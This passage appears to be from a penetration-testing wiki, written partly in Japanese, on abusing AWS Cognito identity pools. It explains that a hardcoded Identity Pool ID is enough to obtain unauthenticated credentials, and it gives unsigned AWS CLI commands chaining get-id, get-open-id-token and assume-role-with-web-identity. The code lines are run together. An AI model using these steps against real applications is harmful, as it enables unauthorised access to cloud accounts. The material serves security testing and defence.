# Sample code to demonstrate how to integrate an identity provider with an identity pool can be structured as follows:import boto3# Initialize the Amazon Cognito Identity clientclient = boto3.client('cognito-identity')# Assume you have already created an identity pool and obtained the IdentityPoolIdidentity_pool_id ='your-identity-pool-id'# Add an identity provider to the identity poolresponse = client.set_identity_pool_roles(IdentityPoolId=identity_pool_id,Roles={'authenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/AuthenticatedRole','unauthenticated': 'arn:aws:iam::AWS_ACCOUNT_ID:role/UnauthenticatedRole',})# Print the response from AWSprint(response)
For more information check https://github.com/padok-team/cognito-scanner
IAMロールへのアクセス
認証されていない
CognitoアプリでAWS資格情報を取得するために攻撃者が必要とする唯一の情報はIdentity Pool IDであり、このIDはWeb / モバイルアプリケーションにハードコードされている必要があります。IDは次のように見えます:eu-west-1:098e5341-8364-038d-16de-1865e435da3b(ブルートフォースできません)。
IAM Cognito未認証ロールはデフォルトでCognito_<Identity Pool name>Unauth_Roleと呼ばれます。
# Get auth IDawscognito-identityget-id--identity-pool-id<identity_pool_id>--no-sign# Get login tokenawscognito-identityget-open-id-token--identity-id<identity_id>--no-sign# Use login token to get IAM session creds## If you don't know the role_arn use the previous enhanced flow to get itaws sts assume-role-with-web-identity --role-arn "arn:aws:iam::<acc_id>:role/<role_name>" --role-session-name sessionname --web-identity-token <token> --no-sign
このエラーを受け取った場合、**基本フローが有効になっていない(デフォルト)**ためです。
An error occurred (InvalidParameterException) when calling the GetOpenIdToken operation: Basic (classic) flow is not enabled, please use enhanced flow.
